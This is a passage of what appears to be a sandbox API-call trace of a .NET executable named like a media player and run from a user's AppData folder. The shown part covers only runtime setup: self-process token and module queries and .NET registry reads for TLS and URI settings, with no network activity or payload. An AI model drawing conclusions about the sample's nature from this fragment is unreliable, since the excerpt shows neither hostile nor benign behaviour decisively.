lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x18e910 | out: lpFileInformation=0x18e910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0218.598] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe.config", nBufferLength=0x105, lpBuffer=0x18e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe.config", lpFilePart=0x0) returned 0x59 [0218.599] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x18e908 | out: lpFileInformation=0x18e908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0218.600] CloseHandle (hObject=0x430) returned 1 [0218.600] GetCurrentProcess () returned 0xffffffffffffffff [0218.600] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ea28 | out: TokenHandle=0x18ea28*=0x430) returned 1 [0218.601] CloseHandle (hObject=0x430) returned 1 [0218.602] GetCurrentProcess () returned 0xffffffffffffffff [0218.602] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ea28 | out: TokenHandle=0x18ea28*=0x430) returned 1 [0218.603] CloseHandle (hObject=0x430) returned 1 [0218.623] GetCurrentProcess () returned 0xffffffffffffffff [0218.623] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e718 | out: TokenHandle=0x18e718*=0x430) returned 1 [0219.118] CloseHandle (hObject=0x430) returned 1 [0219.119] GetCurrentProcess () returned 0xffffffffffffffff [0219.119] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e758 | out: TokenHandle=0x18e758*=0x430) returned 1 [0219.121] CloseHandle (hObject=0x430) returned 1 [0219.398] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430 [0219.400] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x434 [0219.419] GetCurrentProcess () returned 0xffffffffffffffff [0219.419] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e718 | out: TokenHandle=0x18e718*=0x4b8) returned 1 [0219.426] CloseHandle (hObject=0x4b8) returned 1 [0219.771] GetCurrentProcess () returned 0xffffffffffffffff [0219.771] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e758 | out: TokenHandle=0x18e758*=0x4b8) returned 1 [0219.772] CloseHandle (hObject=0x4b8) returned 1 [0219.781] GetCurrentProcess () returned 0xffffffffffffffff [0219.782] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e6d8 | out: TokenHandle=0x18e6d8*=0x4b8) returned 1 [0219.789] CloseHandle (hObject=0x4b8) returned 1 [0219.790] GetCurrentProcess () returned 0xffffffffffffffff [0219.790] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e718 | out: TokenHandle=0x18e718*=0x4b8) returned 1 [0219.790] CloseHandle (hObject=0x4b8) returned 1 [0220.161] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ce38 | out: phkResult=0x18ce38*=0x4b8) returned 0x0 [0220.163] RegQueryValueExW (in: hKey=0x4b8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x18ce88, lpData=0x0, lpcbData=0x18ce80*=0x0 | out: lpType=0x18ce88*=0x1, lpData=0x0, lpcbData=0x18ce80*=0xe) returned 0x0 [0220.163] RegQueryValueExW (in: hKey=0x4b8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x18ce88, lpData=0x225d3e0, lpcbData=0x18ce80*=0xe | out: lpType=0x18ce88*=0x1, lpData="Client", lpcbData=0x18ce80*=0xe) returned 0x0 [0220.164] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.168] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x4b8) returned 0x0 [0220.169] RegQueryValueExW (in: hKey=0x4b8, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x18ec08, lpData=0x0, lpcbData=0x18ec00*=0x0 | out: lpType=0x18ec08*=0x0, lpData=0x0, lpcbData=0x18ec00*=0x0) returned 0x2 [0220.169] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.173] GetCurrentProcessId () returned 0x1518 [0220.173] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.173] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x225dd60, cb=0x200, lpcbNeeded=0x18ec00 | out: lphModule=0x225dd60, lpcbNeeded=0x18ec00) returned 1 [0220.175] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x225dfe8, cb=0x18 | out: lpmodinfo=0x225dfe8*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.175] CoTaskMemAlloc (cb=0x804) returned 0x604200 [0220.175] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x604200, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.175] CoTaskMemFree (pv=0x604200) [0220.175] CoTaskMemAlloc (cb=0x804) returned 0x604200 [0220.175] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x604200, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.176] CoTaskMemFree (pv=0x604200) [0220.176] CloseHandle (hObject=0x4b8) returned 1 [0220.176] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e720, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.177] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x0) returned 0x2 [0220.177] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x4b8) returned 0x0 [0220.177] RegQueryValueExW (in: hKey=0x4b8, lpValueName="UseHttpPipeliningAndBufferPooling", lpReserved=0x0, lpType=0x18ec18, lpData=0x0, lpcbData=0x18ec10*=0x0 | out: lpType=0x18ec18*=0x0, lpData=0x0, lpcbData=0x18ec10*=0x0) returned 0x2 [0220.177] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.178] GetCurrentProcessId () returned 0x1518 [0220.178] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.178] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x2260cc0, cb=0x200, lpcbNeeded=0x18ec00 | out: lphModule=0x2260cc0, lpcbNeeded=0x18ec00) returned 1 [0220.180] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x2260f30, cb=0x18 | out: lpmodinfo=0x2260f30*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.180] CoTaskMemAlloc (cb=0x804) returned 0x604200 [0220.180] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x604200, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.180] CoTaskMemFree (pv=0x604200) [0220.181] CoTaskMemAlloc (cb=0x804) returned 0x604200 [0220.181] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x604200, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.181] CoTaskMemFree (pv=0x604200) [0220.181] CloseHandle (hObject=0x4b8) returned 1 [0220.182] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e720, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.182] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseSafeSynchronousClose", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x0) returned 0x2 [0220.182] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x4b8) returned 0x0 [0220.183] RegQueryValueExW (in: hKey=0x4b8, lpValueName="UseSafeSynchronousClose", lpReserved=0x0, lpType=0x18ec18, lpData=0x0, lpcbData=0x18ec10*=0x0 | out: lpType=0x18ec18*=0x0, lpData=0x0, lpcbData=0x18ec10*=0x0) returned 0x2 [0220.183] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.183] GetCurrentProcessId () returned 0x1518 [0220.184] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.184] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x2263c28, cb=0x200, lpcbNeeded=0x18ec00 | out: lphModule=0x2263c28, lpcbNeeded=0x18ec00) returned 1 [0220.185] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x2263e98, cb=0x18 | out: lpmodinfo=0x2263e98*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.185] CoTaskMemAlloc (cb=0x804) returned 0x604200 [0220.185] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x604200, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.465] CoTaskMemFree (pv=0x604200) [0220.465] CoTaskMemAlloc (cb=0x804) returned 0x604200 [0220.465] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x604200, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.466] CoTaskMemFree (pv=0x604200) [0220.466] CloseHandle (hObject=0x4b8) returned 1 [0220.466] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e720, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.466] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x0) returned 0x2 [0220.467] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x4b8) returned 0x0 [0220.468] RegQueryValueExW (in: hKey=0x4b8, lpValueName="UseStrictRfcInterimResponseHandling", lpReserved=0x0, lpType=0x18ec18, lpData=0x0, lpcbData=0x18ec10*=0x0 | out: lpType=0x18ec18*=0x0, lpData=0x0, lpcbData=0x18ec10*=0x0) returned 0x2 [0220.468] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.468] GetCurrentProcessId () returned 0x1518 [0220.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.469] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x2266b88, cb=0x200, lpcbNeeded=0x18ec00 | out: lphModule=0x2266b88, lpcbNeeded=0x18ec00) returned 1 [0220.470] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x2266df8, cb=0x18 | out: lpmodinfo=0x2266df8*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.470] CoTaskMemAlloc (cb=0x804) returned 0x604690 [0220.470] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x604690, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.470] CoTaskMemFree (pv=0x604690) [0220.471] CoTaskMemAlloc (cb=0x804) returned 0x604690 [0220.471] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x604690, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.471] CoTaskMemFree (pv=0x604690) [0220.471] CloseHandle (hObject=0x4b8) returned 1 [0220.471] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e720, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.472] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowDangerousUnicodeDecompositions", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x0) returned 0x2 [0220.472] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x4b8) returned 0x0 [0220.472] RegQueryValueExW (in: hKey=0x4b8, lpValueName="AllowDangerousUnicodeDecompositions", lpReserved=0x0, lpType=0x18ec18, lpData=0x0, lpcbData=0x18ec10*=0x0 | out: lpType=0x18ec18*=0x0, lpData=0x0, lpcbData=0x18ec10*=0x0) returned 0x2 [0220.472] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.473] GetCurrentProcessId () returned 0x1518 [0220.473] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.473] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x2269a50, cb=0x200, lpcbNeeded=0x18ec00 | out: lphModule=0x2269a50, lpcbNeeded=0x18ec00) returned 1 [0220.475] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x2269cc0, cb=0x18 | out: lpmodinfo=0x2269cc0*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.475] CoTaskMemAlloc (cb=0x804) returned 0x604690 [0220.475] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x604690, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.475] CoTaskMemFree (pv=0x604690) [0220.475] CoTaskMemAlloc (cb=0x804) returned 0x604690 [0220.475] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x604690, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.476] CoTaskMemFree (pv=0x604690) [0220.476] CloseHandle (hObject=0x4b8) returned 1 [0220.476] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e720, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.477] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.UseStrictIPv6AddressParsing", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x0) returned 0x2 [0220.477] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x4b8) returned 0x0 [0220.477] RegQueryValueExW (in: hKey=0x4b8, lpValueName="UseStrictIPv6AddressParsing", lpReserved=0x0, lpType=0x18ec18, lpData=0x0, lpcbData=0x18ec10*=0x0 | out: lpType=0x18ec18*=0x0, lpData=0x0, lpcbData=0x18ec10*=0x0) returned 0x2 [0220.477] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.478] GetCurrentProcessId () returned 0x1518 [0220.478] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.478] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x226c918, cb=0x200, lpcbNeeded=0x18ec00 | out: lphModule=0x226c918, lpcbNeeded=0x18ec00) returned 1 [0220.480] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x226cb88, cb=0x18 | out: lpmodinfo=0x226cb88*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.480] CoTaskMemAlloc (cb=0x804) returned 0x604690 [0220.480] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x604690, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.480] CoTaskMemFree (pv=0x604690) [0220.480] CoTaskMemAlloc (cb=0x804) returned 0x604690 [0220.480] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x604690, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.481] CoTaskMemFree (pv=0x604690) [0220.481] CloseHandle (hObject=0x4b8) returned 1 [0220.481] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e720, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.481] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowAllUriEncodingExpansion", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x0) returned 0x2 [0220.482] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebd8 | out: phkResult=0x18ebd8*=0x4b8) returned 0x0 [0220.482] RegQueryValueExW (in: hKey=0x4b8, lpValueName="AllowAllUriEncodingExpansion", lpReserved=0x0, lpType=0x18ec18, lpData=0x0, lpcbData=0x18ec10*=0x0 | out: lpType=0x18ec18*=0x0, lpData=0x0, lpcbData=0x18ec10*=0x0) returned 0x2 [0220.482] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.496] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x4b8) returned 0x0 [0220.496] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x18ec08, lpData=0x0, lpcbData=0x18ec00*=0x0 | out: lpType=0x18ec08*=0x4, lpData=0x0, lpcbData=0x18ec00*=0x4) returned 0x0 [0220.496] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x18ec08, lpData=0x18ebe8, lpcbData=0x18ec00*=0x4 | out: lpType=0x18ec08*=0x4, lpData=0x18ebe8*=0x1, lpcbData=0x18ec00*=0x4) returned 0x0 [0220.498] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x18ec78, lpData=0x0, lpcbData=0x18ec70*=0x0 | out: lpType=0x18ec78*=0x4, lpData=0x0, lpcbData=0x18ec70*=0x4) returned 0x0 [0220.832] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.833] GetCurrentProcessId () returned 0x1518 [0220.834] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.834] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x2270f48, cb=0x200, lpcbNeeded=0x18ebf0 | out: lphModule=0x2270f48, lpcbNeeded=0x18ebf0) returned 1 [0220.835] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x22711b8, cb=0x18 | out: lpmodinfo=0x22711b8*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.835] CoTaskMemAlloc (cb=0x804) returned 0x604690 [0220.835] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x604690, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.836] CoTaskMemFree (pv=0x604690) [0220.836] CoTaskMemAlloc (cb=0x804) returned 0x604690 [0220.836] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x604690, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.837] CoTaskMemFree (pv=0x604690) [0220.837] CloseHandle (hObject=0x4b8) returned 1 [0220.837] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x0) returned 0x2 [0220.838] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x4b8) returned 0x0 [0220.838] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x18ec08, lpData=0x0, lpcbData=0x18ec00*=0x0 | out: lpType=0x18ec08*=0x0, lpData=0x0, lpcbData=0x18ec00*=0x0) returned 0x2 [0220.838] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.839] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x4b8) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x18ec08, lpData=0x0, lpcbData=0x18ec00*=0x0 | out: lpType=0x18ec08*=0x4, lpData=0x0, lpcbData=0x18ec00*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x18ec08, lpData=0x18ebe8, lpcbData=0x18ec00*=0x4 | out: lpType=0x18ec08*=0x4, lpData=0x18ebe8*=0x1, lpcbData=0x18ec00*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x4b8, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x18ec78, lpData=0x0, lpcbData=0x18ec70*=0x0 | out: lpType=0x18ec78*=0x4, lpData=0x0, lpcbData=0x18ec70*=0x4) returned 0x0 [0220.839] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.840] GetCurrentProcessId () returned 0x1518 [0220.840] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.840] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x2274178, cb=0x200, lpcbNeeded=0x18ebf0 | out: lphModule=0x2274178, lpcbNeeded=0x18ebf0) returned 1 [0220.841] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x22743e8, cb=0x18 | out: lpmodinfo=0x22743e8*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.841] CoTaskMemAlloc (cb=0x804) returned 0x1afc1150 [0220.842] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x1afc1150, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.843] CoTaskMemFree (pv=0x1afc1150) [0220.843] CoTaskMemAlloc (cb=0x804) returned 0x1afc1150 [0220.843] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x1afc1150, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.844] CoTaskMemFree (pv=0x1afc1150) [0220.844] CloseHandle (hObject=0x4b8) returned 1 [0220.844] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, 